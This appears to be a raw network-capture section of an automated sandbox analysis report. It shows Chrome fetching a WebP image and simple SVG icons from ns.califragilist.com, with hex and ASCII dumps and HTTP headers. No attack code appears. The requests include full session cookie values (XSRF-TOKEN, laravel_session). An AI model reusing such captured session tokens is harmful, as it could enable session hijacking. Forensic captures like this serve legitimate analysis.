                                                                                                                                              2024-11-06 15:56:05 UTC337INData Raw: 52 49 46 46 aa 45 00 00 57 45 42 50 56 50 38 58 0a 00 00 00 30 00 00 00 8d 09 00 82 03 00 49 43 43 50 c8 01 00 00 00 00 01 c8 00 00 00 00 04 30 00 00 6d 6e 74 72 52 47 42 20 58 59 5a 20 07 e0 00 01 00 01 00 00 00 00 00 00 61 63 73 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 f6 d6 00 01 00 00 00 00 d3 2d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 09 64 65 73 63 00 00 00 f0 00 00 00 24 72 58 59 5a 00 00 01 14 00 00 00 14 67 58 59 5a 00 00 01 28 00 00 00 14 62 58 59 5a 00 00 01 3c 00 00 00 14 77 74 70 74 00 00 01 50 00 00 00 14 72 54 52 43 00 00 01 64 00 00 00 28 67 54 52 43 00 00 01 64 00 00 00 28 62
                                                                                                                                              Data Ascii: RIFFEWEBPVP8X0ICCP0mntrRGB XYZ acsp-desc$rXYZgXYZ(bXYZ<wtptPrTRCd(gTRCd(b
                                                                                                                                              2024-11-06 15:56:05 UTC1369INData Raw: 20 00 00 00 00 00 00 62 99 00 00 b7 85 00 00 18 da 58 59 5a 20 00 00 00 00 00 00 24 a0 00 00 0f 84 00 00 b6 cf 58 59 5a 20 00 00 00 00 00 00 f6 d6 00 01 00 00 00 00 d3 2d 70 61 72 61 00 00 00 00 00 04 00 00 00 02 66 66 00 00 f2 a7 00 00 0d 59 00 00 13 d0 00 00 0a 5b 00 00 00 00 00 00 00 00 6d 6c 75 63 00 00 00 00 00 00 00 01 00 00 00 0c 65 6e 55 53 00 00 00 20 00 00 00 1c 00 47 00 6f 00 6f 00 67 00 6c 00 65 00 20 00 49 00 6e 00 63 00 2e 00 20 00 32 00 30 00 31 00 36 41 4c 50 48 e9 2c 00 00 0d 24 c5 6d db 38 d2 fe 6b a7 5c bf 6f 44 4c 80 cf 8b 20 0b c4 54 55 8a 05 ce ab 8e 33 27 f4 7b ed 67 db 1f 36 ad f6 32 81 cd 04 36 13 44 4c 60 65 82 98 09 22 26 40 9d a0 62 82 23 26 40 99 a0 ca 04 c8 13 54 99 a0 f2 04 95 27 e0 8f b6 90 9f 24 9b 1c 8e bf af 11 31 01 64
                                                                                                                                              Data Ascii: bXYZ $XYZ -paraffY[mlucenUS Google Inc. 2016ALPH,$m8k\oDL TU3'{g626DL`e"&@b#&@T'$1d
                                                                                                                                              2024-11-06 15:56:05 UTC1369INData Raw: e1 84 cf b6 1c f4 87 17 a4 df f6 bc c3 c7 d5 a8 90 8b e8 30 df 6c 45 03 fd c7 c2 7d 3e 1a ff 41 ea ac ef 2b 7c 68 ab 47 99 89 e8 30 e3 f5 9a c6 fe 18 cb d5 a3 ac 61 ec 12 30 9f 8f 04 d2 ee 7b 8e 8f ef ee ca 66 c1 04 d6 72 85 29 97 28 0c 94 a2 1b f0 e9 b6 23 3b 22 e1 ba ef 39 16 f4 18 00 b4 4d 16 d0 32 07 a6 91 e7 f0 0b ab d6 55 a4 2e 56 bb 29 8d bb ea c8 d4 a7 1b 0e 72 95 10 ff 86 65 7c 0a de 47 1f f1 db 30 a2 66 35 63 ac 49 ab d9 9a f4 5a 83 c4 4f 3e b8 e8 f1 7b 3f a1 66 35 6b db 2e 1f be aa d1 5c fb 52 49 14 57 3e 56 44 4f f8 74 cb c8 06 7c 2c 4f ce 39 bc 3b fa e8 bd bf e2 fd 2e 21 28 95 5c 6d 90 f2 c9 3a 87 77 47 1f 7d 08 03 63 9c 6d b2 58 d9 94 ba 54 a2 3c de 68 9a d3 b7 cf 37 2d 99 f9 48 1c ad 03 61 70 76 e8 55 93 4c b3 35 a9 59 a4 3b 6a 0b 4a ef 9d
                                                                                                                                              Data Ascii: 0lE}>A+|hG0a0{fr)(#;"9M2U.V)re|G0f5cIZO>{?f5k.\RIW>VDOt|,O9;.!(\m:wG}cmXT<h7-HapvUL5Y;jJ
                                                                                                                                              2024-11-06 15:56:05 UTC1369INData Raw: c4 d1 b8 42 70 85 2c 9b 5e 3e e9 6c 5a 29 90 69 23 c4 c9 d8 34 2e af 2d 4a 36 60 39 fa d5 07 18 41 d3 dc b8 cc 18 28 35 96 6b ab 38 32 ae a4 18 54 28 40 af 51 40 21 2a e4 bc 17 57 ca 15 80 2b e4 5b c7 4c b8 6a 90 f3 4e dc 2a 73 89 e2 54 8e 88 81 d8 2c 88 15 48 2a 08 93 99 24 31 8b a5 55 1d 72 df ab 9b ec 6a 83 02 0a 85 ec 3b 75 a5 5c 66 b5 6e 30 b7 5c 21 fb 46 6d 95 b9 b4 8d 3f 89 04 95 9d 9b 76 d5 22 0c 7b 9a de c5 ac ea 1d c5 01 0b b5 96 7b 2c 40 a6 91 3f 37 28 62 a7 ae 44 c8 a9 d7 98 5b ae 50 c4 46 dd 28 77 69 ea 89 1c 88 39 d1 11 73 db 50 f8 f5 07 18 41 53 6d 6d 56 02 94 66 a1 08 85 25 c8 34 b2 6f 0d 8a d9 99 83 8e b9 d4 06 73 5b eb 06 a5 ec d4 28 e3 45 a9 07 b1 25 6a 2b 22 3b 3b a4 71 05 c2 dd 34 24 90 3a 2b 49 31 fe 58 24 ad c1 22 64 1a d9 ab 3d 4a
                                                                                                                                              Data Ascii: Bp,^>lZ)i#4.-J6`9A(5k82T(@Q@!*W+[LjN*sT,H*$1Urj;u\fn0\!Fm?v"{{,@?7(bD[PF(wi9sPASmmVf%4os[(E%j+";;q4$:+I1X$"d=J
                                                                                                                                              2024-11-06 15:56:05 UTC1369INData Raw: 10 1d 0c 51 5d b4 42 9e 76 48 b5 26 fa 33 d7 c8 ba 52 37 22 ce 0e 50 f5 6a 90 71 b5 40 4b 9a 6e 0c 49 49 12 bb 20 d8 2e 9d 49 3f 83 d8 19 77 27 9b 22 1d bd f3 f1 77 ac 66 8c 6d ce a2 91 ea a0 5e 41 69 ed a0 f6 a9 6c b6 fa 5c 3d c8 ef 41 6e cc a8 fa 2a 0d 8d 54 07 f5 03 94 5e 1f a5 ac 12 a9 be a8 b7 f8 78 96 9a 11 45 9f 54 cd 88 42 20 5a be 8f df 90 2c 23 f2 bf 13 7b e4 be 7b 14 3e 95 ba 20 00 f6 8f 46 ad 15 84 b1 23 81 d4 29 d5 3b 8a e9 db 82 d0 48 75 d2 cf 48 30 1a bd 55 4d 69 06 63 f1 56 1f bd f7 63 2f ba 77 49 24 7a 92 af a0 0e 6a 30 5d 1a 50 3a 9e 89 93 7d 41 8a 41 b9 7b 59 25 c0 ab 44 46 f9 13 d4 51 db c7 5d 1a 78 38 86 37 5c 78 47 81 84 2b a2 f8 1b d1 21 ff e6 60 4c 22 ac 2c a8 e4 bd 70 eb 04 30 82 46 98 94 04 28 0d 96 a3 40 aa c7 af 48 d5 a8 ad 6a
                                                                                                                                              Data Ascii: Q]BvH&3R7"Pjq@KnII .I?w'"wfm^Ail\=An*T^xETB Z,#{{> F#);HuH0UMicVc/wI$zj0]P:}AA{Y%DFQ]x87\xG+!`L",p0F(@Hj
                                                                                                                                              2024-11-06 15:56:05 UTC1369INData Raw: 70 74 99 54 5f d4 ba 80 bb 69 48 ba 31 d0 d4 9c 44 2f 87 b6 22 1b 5e 67 6b 7a 49 8b 81 dc 20 ef 30 6d a8 aa eb f0 9e 58 93 61 bf 95 31 bb ba 21 b3 c8 dc f6 54 60 fe 52 84 c6 9c 24 59 9b d8 f1 01 d4 41 5e 99 2a 89 fd 10 ce 16 4e 1e 3e 22 04 9c 39 fa 5f 42 80 c3 50 33 ce 58 93 1c 1e 8e 61 55 00 5a 92 40 18 9a 1e 94 a7 d7 e5 c0 41 6e 30 db 16 69 f3 d2 c1 08 2a 30 ff 1e cf e8 b0 bf 97 3e 37 8e d9 e3 ee 62 04 3c dc f3 58 90 49 bc 22 41 2b 8f 9b 14 20 f5 d9 8c 45 ba d1 3b ef af 78 cf ab b4 a0 d4 67 14 d1 2e 0c f5 0e ce 17 86 73 cb c2 88 9c 24 89 c6 72 9a be 7d 14 4e c8 dd f6 c9 61 e8 e8 b0 31 47 1d f3 62 64 d3 4b 76 db 8a 8a f9 0b 12 36 c7 de d3 24 3d ee 91 66 e4 5f f6 29 08 73 b6 f4 83 b3 6e 2b 76 49 ed 87 f0 19 a5 59 18 8f ef e9 16 c6 b0 30 e2 71 4f d2 dc 5a
                                                                                                                                              Data Ascii: ptT_iH1D/"^gkzI 0mXa1!T`R$YA^*N>"9_BP3XaUZ@An0i*0>7b<XI"A+ E;xg.s$r}Na1GbdKv6$=f_)sn+vIY0qOZ
                                                                                                                                              2024-11-06 15:56:05 UTC1369INData Raw: 13 dc b8 a7 02 77 67 88 35 d5 09 39 c7 9a a8 ec e1 aa a1 6a c3 ea c0 b6 a1 80 30 6f aa 39 89 c1 bf f5 e6 c9 6c f2 c1 e6 49 84 7f 9f a0 54 0e 9e 51 c5 ac 1c 27 aa 63 c9 60 fb b5 05 18 41 b2 3f c6 b7 f4 f8 94 00 2f ef 1e f2 c1 e6 20 fc bf 4f 61 d8 67 40 1f b2 22 df 9c 8a e6 19 d5 0a 21 11 84 79 8b 24 39 62 69 d7 f1 b2 d0 66 85 a8 4e 7a 93 0d aa 83 88 cb 25 5e 6a 60 7b aa 66 8a ef 73 bc 64 9e 11 15 9e ae 8e ab 03 e1 b4 4b 85 83 d4 2c 2e e6 2f 0b 4d 5e 80 93 77 b2 ca 05 cd a1 8f 39 70 37 0b fe 72 b3 ad 88 c0 fc fb ca 1e eb 25 c3 fc ea 00 8c 20 d9 5c f9 3f 09 92 f1 fb e2 ba b0 8e 64 80 32 8f fb 5c b0 f9 22 72 f8 b7 d3 f6 54 dc 9d 61 e8 0a 36 f3 63 43 b4 46 68 6f 1b 0a 48 fd 87 7a 47 62 70 b9 f6 8c aa 0d 73 10 12 40 94 83 da 67 82 dd 8d 9e 2b 76 b9 72 9c aa 8e
                                                                                                                                              Data Ascii: wg59j0o9lITQ'c`A?/ Oag@"!y$9bifNz%^j`{fsdK,./M^w9p7r% \?d2\"rTa6cCFhoHzGbps@g+vr
                                                                                                                                              2024-11-06 15:56:05 UTC1369INData Raw: 99 f0 86 4e 2f 06 b4 61 26 84 f7 e5 30 20 1f 5f cf e7 6e 1a 9a ea 49 a4 a7 40 7d c4 fb eb 58 0c 09 fa 23 56 0e 8d 48 4e 63 e1 1a 41 87 cd bd 5c 42 5a d2 55 87 3e 8f 5a d1 1d 51 50 c7 93 db 56 64 30 32 66 51 6b 90 8f 3f 97 03 f3 33 d1 7e 3b e8 52 48 d0 5b 10 6a 49 83 ee 56 a7 c6 1b 32 7b 06 e3 4c 21 f8 2e 01 bb 76 a0 65 6a d3 cb d2 d1 32 01 ec b7 22 a3 36 cc 45 98 36 64 d8 dc cb 2c 2c e8 f5 59 b8 cb 24 fd e8 7a ba e6 51 64 a1 41 af b0 1c b9 9b 09 e0 9f 5b 11 8a c0 f6 09 38 0a 23 88 a0 ac 4f ab d6 c8 a0 fe e7 5a c4 12 30 85 f5 87 30 76 89 59 2c dd 30 76 09 60 7f 65 b2 91 0f 37 73 01 2d e9 f0 30 99 0c 14 e8 c7 1f 67 51 5c 84 59 80 11 74 d8 6d 65 06 02 f4 d3 cb 8c 38 4e d5 db d9 40 f7 64 74 01 5a 03 fa f1 3b 45 3c ee 89 aa 27 19 93 d2 20 3f e0 ac bb 27 69 f3
                                                                                                                                              Data Ascii: N/a&0 _nI@}X#VHNcA\BZU>ZQPVd02fQk?3~;RH[jIV2{L!.vej2"6E6d,,Y$zQdA[8#OZ00vY,0v`e7s-0gQ\Ytme8N@dtZ;E<' ?'i
                                                                                                                                              2024-11-06 15:56:05 UTC1369INData Raw: de b6 a7 18 02 00 1f 59 0d 80 a3 43 86 02 89 fa e3 d7 34 80 8a 73 c6 c7 00 38 56 a3 de 20 e9 d3 b7 d4 7e ed 78 cb d8 18 a2 07 e0 6a 06 a0 6d eb 0d 72 3c fe 58 51 b0 b7 4d 12 e3 8f 05 05 73 b5 4f 6d b1 da 69 9f 56 e6 c3 4b 7a bf 56 8c b7 6d db fe 21 69 43 00 7f fc 9a 56 e6 a7 e7 39 b2 7d 2a f3 bf a9 db 16 00 ab 91 ef 23 92 55 db 2e 91 df 36 2d c0 91 be 40 b6 4d 5b 33 00 1c 39 8f 5f b1 a6 68 44 12 1a 8b 5a de 6f 3e 06 90 f7 9b d9 18 1f 30 af c3 2b 05 d4 b6 9b 8d e9 01 73 1c ae 9a 85 54 c0 e1 25 1d 88 a7 2a a1 4c ef 31 eb 3d 56 15 b5 4c c2 2c ab 28 0e d5 c7 20 ca a7 6a 26 a6 3d 66 56 82 b6 7f 6a e6 42 60 9e 6d ff 41 1a 1f 90 70 50 a6 70 87 d7 59 bb c7 ba 62 3c ee 13 38 62 61 07 e1 3e 06 f0 ca ce 84 c4 cc 1e 40 1c c5 a1 9a 87 7b cc b4 11 1f a3 69 8f a4 ed e9
                                                                                                                                              Data Ascii: YC4s8V ~xjmr<XQMsOmiVKzVm!iCV9}*#U.6-@M[39_hDZo>0+sT%*L1=VL,( j&=fVjB`mApPpYb<8ba>@{i
                                                                                                                                              2024-11-06 15:56:05 UTC1369INData Raw: fe cb 6f 02 49 c6 ce 9d 25 df 60 a8 88 4d a0 c9 de 5a 77 cd 39 6b 12 18 bd 73 3f 90 a4 73 44 c5 0e d6 0e 9c f3 2e 85 d1 79 f7 03 65 f4 ce b9 1b c6 58 97 c0 e0 9c 43 91 83 75 47 ce 39 ab 12 18 bd 73 3f 50 c6 60 88 0a 68 cd d0 f7 3b 9a 93 73 0e 65 8f ce f9 81 b3 96 75 69 4c de 3b ff 8a 99 b4 d6 de f4 9c 55 34 a3 77 f6 15 c5 0c d6 b9 1b ce d8 26 8d d1 7b e7 b0 f6 ec 9d f3 13 e3 6d db 9d eb 14 7d f0 1e 4b d8 39 37 b0 96 b1 ba 3b d7 18 7c f0 1e 85 f5 de fb a1 65 ac 6d 59 75 9e 53 74 c1 7b 14 dd 39 e7 af 19 6b 5b 56 9d 69 0c 3e 3a 8f 45 1d ad 3d 72 ce da cd 19 26 1f bc 77 98 49 e7 83 1f da 96 d5 1c ac 3a d7 00 17 7d f8 89 99 f5 d6 f9 1b d6 f2 7a 73 8e 21 7a 17 5e 51 5c ef bc 3f f1 b6 e5 e8 ce 77 8a 2e 7a 8f d5 e8 e8 5d 08 03 58 0d fe a6 e8 01 87 85 ed 83 f7 71
                                                                                                                                              Data Ascii: oI%`MZw9ks?sD.yeXCuG9s?P`h;seuiL;U4w&{m}K97;|emYuSt{9k[Vi>:E=r&wI:}zs!z^Q\?w.z]Xq


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              91192.168.2.1849879188.114.96.34432212C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2024-11-06 15:56:05 UTC1126OUTGET /yzCIRquaPFUjERvoqJYr7I3cogJBrGklDFyrsAZD9QeqnvfO79zHfIab179 HTTP/1.1
                                                                                                                                              Host: ns.califragilist.com
                                                                                                                                              Connection: keep-alive
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              Accept: */*
                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Cookie: XSRF-TOKEN=eyJpdiI6IjlsbDRKdnpIZUhKTm9hTnl5RnNvZXc9PSIsInZhbHVlIjoiSmw1cWVFeHdFRWVHV291bkk2ZkdkQ3owaXR6b3JWeUNIb1IrWHBsTFkxczZhUElyYnZnellWc3dqVGNyYXdVUTdUUDI5S05tZVJmRjVBR0ZYY05qZWhpRGg1ZU5vRGxocXRkdDBWbnVWbFZLS0ZIcHhNelVTeENzcGF2R2szU0kiLCJtYWMiOiJkZDY3MmQ5OGVhYWQ1YjhmNmQxMWIzOTFhNDIxOTZmODM5YTdkNmU2MmJkMGU3OTQwNTBjZDY4MWMzYjJjZDdmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlhhdWJ1d0ExN3QzTHNxc3hUd2Y2NVE9PSIsInZhbHVlIjoiTVRHNlhqOTFRcStTT0MvY1c5TTh0THd1WmpyZUhZd2djMmxYa2o4M1V2aC9JVDRoM05lZ29ETTl5MXNQbzY3NkRkTjV5REhBdG1sMmR0cUZ0b3pzYlBRdWdHdVZVUzNpT2Y0bkNMdVN5T1RIYVNmV1lFT0NyTDU5TTRmbnVMMDgiLCJtYWMiOiIwZWJjMzU2OWYzY2Y5NmVkNzA3MGE0OGI5OGE1ZDExYjFmOTg3MmMzZDZhOWFlNjk3MWIwODIxZDRlZTFiZjRkIiwidGFnIjoiIn0%3D
                                                                                                                                              2024-11-06 15:56:06 UTC1058INHTTP/1.1 200 OK
                                                                                                                                              Date: Wed, 06 Nov 2024 15:56:06 GMT
                                                                                                                                              Content-Type: image/svg+xml
                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                              Connection: close
                                                                                                                                              Content-Disposition: inline; filename="yzCIRquaPFUjERvoqJYr7I3cogJBrGklDFyrsAZD9QeqnvfO79zHfIab179"
                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pAOtq%2FODxsRBbBpuCHfP56Xdb5jhZSP894vulgGa9WmJwWRKycUPHfVZdHu77693qiW3Y6OvxQDbYuML25wMX1F0v37q9ZlQWY5I3Gf3mPCIKR9VIo2dDP96fvFDYQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=3337&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2823&recv_bytes=2048&delivery_rate=873341&cwnd=251&unsent_bytes=0&cid=bc1bb3ea527a7d93&ts=142&x=0"
                                                                                                                                              vary: accept-encoding
                                                                                                                                              Server: cloudflare
                                                                                                                                              CF-RAY: 8de64587afd2461e-DFW
                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1878&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2843&recv_bytes=1704&delivery_rate=1444389&cwnd=251&unsent_bytes=0&cid=51c7d26cc90c405e&ts=567&x=0"
                                                                                                                                              2024-11-06 15:56:06 UTC311INData Raw: 62 35 39 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 34 38 20 34 38 22 3e 3c 74 69 74 6c 65 3e 61 73 73 65 74 73 3c 2f 74 69 74 6c 65 3e 3c 72 65 63 74 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 2f 3e 3c 70 61 74 68 20 64 3d 22 4d 33 30 2e 34 32 32 2c 32 39 2e 30 39 32 61 33 2e 34 39 33 2c 33 2e 34 39 33 2c 30 2c 30 2c 31 2c 31 2e 33 32 34 2e 32 36 31 2c 33 2e 33 38 31 2c 33 2e 33 38 31 2c 30 2c 30 2c 31 2c 31 2e 31 33 32 2e 37 34 39 71 2e 33 36 36 2e 33 36 36 2e 38 32 37 2e 37 37 35 74 2e 39 34 39 2e 38 35
                                                                                                                                              Data Ascii: b59<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M30.422,29.092a3.493,3.493,0,0,1,1.324.261,3.381,3.381,0,0,1,1.132.749q.366.366.827.775t.949.85
                                                                                                                                              2024-11-06 15:56:06 UTC1369INData Raw: 30 2c 30 2c 31 2c 33 37 2c 33 34 2e 37 33 36 61 33 2e 31 33 33 2c 33 2e 31 33 33 2c 30 2c 30 2c 31 2c 2e 32 31 38 2c 31 2e 31 35 2c 33 2e 34 39 33 2c 33 2e 34 39 33 2c 30 2c 30 2c 31 2d 2e 32 36 31 2c 31 2e 33 32 34 2c 33 2e 33 38 31 2c 33 2e 33 38 31 2c 30 2c 30 2c 31 2d 2e 37 34 39 2c 31 2e 31 33 32 71 2d 2e 38 38 38 2e 38 38 38 2d 31 2e 36 2c 31 2e 35 36 38 61 38 2e 37 35 33 2c 38 2e 37 35 33 2c 30 2c 30 2c 31 2d 31 2e 34 38 39 2c 31 2e 31 35 2c 36 2e 31 37 2c 36 2e 31 37 2c 30 2c 30 2c 31 2d 31 2e 37 31 36 2e 37 30 35 41 39 2e 33 36 37 2c 39 2e 33 36 37 2c 30 2c 30 2c 31 2c 32 39 2e 31 35 31 2c 34 32 61 31 33 2e 37 33 2c 31 33 2e 37 33 2c 30 2c 30 2c 31 2d 33 2e 39 2d 2e 35 39 32 41 32 31 2e 38 39 31 2c 32 31 2e 38 39 31 2c 30 2c 30 2c 31 2c 32 31 2e
                                                                                                                                              Data Ascii: 0,0,1,37,34.736a3.133,3.133,0,0,1,.218,1.15,3.493,3.493,0,0,1-.261,1.324,3.381,3.381,0,0,1-.749,1.132q-.888.888-1.6,1.568a8.753,8.753,0,0,1-1.489,1.15,6.17,6.17,0,0,1-1.716.705A9.367,9.367,0,0,1,29.151,42a13.73,13.73,0,0,1-3.9-.592A21.891,21.891,0,0,1,21.
                                                                                                                                              2024-11-06 15:56:06 UTC1232INData Raw: 32 61 31 2e 31 38 39 2c 31 2e 31 38 39 2c 30 2c 30 2c 30 2c 2e 33 36 36 2d 2e 38 37 31 2c 31 2e 33 38 32 2c 31 2e 33 38 32 2c 30 2c 30 2c 30 2d 2e 32 37 39 2d 2e 36 35 33 41 31 30 2e 34 2c 31 30 2e 34 2c 30 2c 30 2c 30 2c 33 34 2c 33 34 2e 33 30 39 61 31 34 2e 30 36 2c 31 34 2e 30 36 2c 30 2c 30 2c 30 2d 2e 39 35 38 2d 31 2e 30 33 36 71 2d 2e 35 33 31 2d 2e 35 32 33 2d 31 2e 30 33 36 2d 2e 39 35 38 61 38 2e 39 35 2c 38 2e 39 35 2c 30 2c 30 2c 30 2d 2e 39 33 32 2d 2e 37 31 34 2c 31 2e 33 38 32 2c 31 2e 33 38 32 2c 30 2c 30 2c 30 2d 2e 36 35 33 2d 2e 32 37 39 2c 31 2e 32 31 34 2c 31 2e 32 31 34 2c 30 2c 30 2c 30 2d 2e 37 2e 32 32 36 2c 34 2e 31 2c 34 2e 31 2c 30 2c 30 2c 30 2d 2e 36 35 33 2e 35 36 36 71 2d 2e 33 32 32 2e 33 34 2d 2e 36 37 39 2e 37 33 32 61
                                                                                                                                              Data Ascii: 2a1.189,1.189,0,0,0,.366-.871,1.382,1.382,0,0,0-.279-.653A10.4,10.4,0,0,0,34,34.309a14.06,14.06,0,0,0-.958-1.036q-.531-.523-1.036-.958a8.95,8.95,0,0,0-.932-.714,1.382,1.382,0,0,0-.653-.279,1.214,1.214,0,0,0-.7.226,4.1,4.1,0,0,0-.653.566q-.322.34-.679.732a
                                                                                                                                              2024-11-06 15:56:06 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                              Data Ascii: 0


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              92192.168.2.1849884188.114.96.34432212C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2024-11-06 15:56:06 UTC1128OUTGET /rsvqFqFKEhRzIVFcaSXFIFklJZjDuvi98kzxNrUiaZdwEP3buTKNzKLKef192 HTTP/1.1
                                                                                                                                              Host: ns.califragilist.com
                                                                                                                                              Connection: keep-alive
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              Accept: */*
                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Cookie: XSRF-TOKEN=eyJpdiI6IjlsbDRKdnpIZUhKTm9hTnl5RnNvZXc9PSIsInZhbHVlIjoiSmw1cWVFeHdFRWVHV291bkk2ZkdkQ3owaXR6b3JWeUNIb1IrWHBsTFkxczZhUElyYnZnellWc3dqVGNyYXdVUTdUUDI5S05tZVJmRjVBR0ZYY05qZWhpRGg1ZU5vRGxocXRkdDBWbnVWbFZLS0ZIcHhNelVTeENzcGF2R2szU0kiLCJtYWMiOiJkZDY3MmQ5OGVhYWQ1YjhmNmQxMWIzOTFhNDIxOTZmODM5YTdkNmU2MmJkMGU3OTQwNTBjZDY4MWMzYjJjZDdmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlhhdWJ1d0ExN3QzTHNxc3hUd2Y2NVE9PSIsInZhbHVlIjoiTVRHNlhqOTFRcStTT0MvY1c5TTh0THd1WmpyZUhZd2djMmxYa2o4M1V2aC9JVDRoM05lZ29ETTl5MXNQbzY3NkRkTjV5REhBdG1sMmR0cUZ0b3pzYlBRdWdHdVZVUzNpT2Y0bkNMdVN5T1RIYVNmV1lFT0NyTDU5TTRmbnVMMDgiLCJtYWMiOiIwZWJjMzU2OWYzY2Y5NmVkNzA3MGE0OGI5OGE1ZDExYjFmOTg3MmMzZDZhOWFlNjk3MWIwODIxZDRlZTFiZjRkIiwidGFnIjoiIn0%3D
                                                                                                                                              2024-11-06 15:56:10 UTC1076INHTTP/1.1 200 OK
                                                                                                                                              Date: Wed, 06 Nov 2024 15:56:10 GMT
                                                                                                                                              Content-Type: image/svg+xml
                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                              Connection: close
                                                                                                                                              Content-Disposition: inline; filename="rsvqFqFKEhRzIVFcaSXFIFklJZjDuvi98kzxNrUiaZdwEP3buTKNzKLKef192"
                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4%2BsN3PZc97n6PKudD929%2FFkUrxNi6P45%2BA5%2FZoIdl6gmKsT4Jjb5aPVxKvKnboZaVG003A0NU44c5TgMDQUcn%2B2%2FnhKPjAHRzV%2FRwsTMOsIrLAUSVgQ%2FPWxyXChG3g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=3360&sent=4&recv=8&lost=0&retrans=0&sent_bytes=2824&recv_bytes=2050&delivery_rate=853019&cwnd=251&unsent_bytes=0&cid=d0a9f4adb7d7e733&ts=3616&x=0"
                                                                                                                                              vary: accept-encoding
                                                                                                                                              Server: cloudflare
                                                                                                                                              CF-RAY: 8de6458d4e6a2cc6-DFW
                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1514&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2843&recv_bytes=1706&delivery_rate=2029432&cwnd=251&unsent_bytes=0&cid=f8f66412a561be3c&ts=3940&x=0"
                                                                                                                                              2024-11-06 15:56:10 UTC275INData Raw: 31 30 63 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 34 38 20 34 38 22 3e 3c 74 69 74 6c 65 3e 61 73 73 65 74 73 3c 2f 74 69 74 6c 65 3e 3c 72 65 63 74 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 2f 3e 3c 70 61 74 68 20 64 3d 22 4d 31 30 2c 33 32 48 33 38 56 31 38 2e 31 32 35 4c 32 34 2c 32 35 2e 31 30 39 2c 31 30 2c 31 38 2e 31 32 35 56 33 32 6d 2e 32 33 34 2d 31 36 4c 32 34 2c 32 32 2e 38 39 31 2c 33 37 2e 37 36 36 2c 31 36 48 31 30 2e 32 33 34 4d 34 30 2c 33 34 48 38 56 31 34 48 34 30 5a 22 20 66 69 6c 6c
                                                                                                                                              Data Ascii: 10c<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M10,32H38V18.125L24,25.109,10,18.125V32m.234-16L24,22.891,37.766,16H10.234M40,34H8V14H40Z" fill
                                                                                                                                              2024-11-06 15:56:10 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                              Data Ascii: 0


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
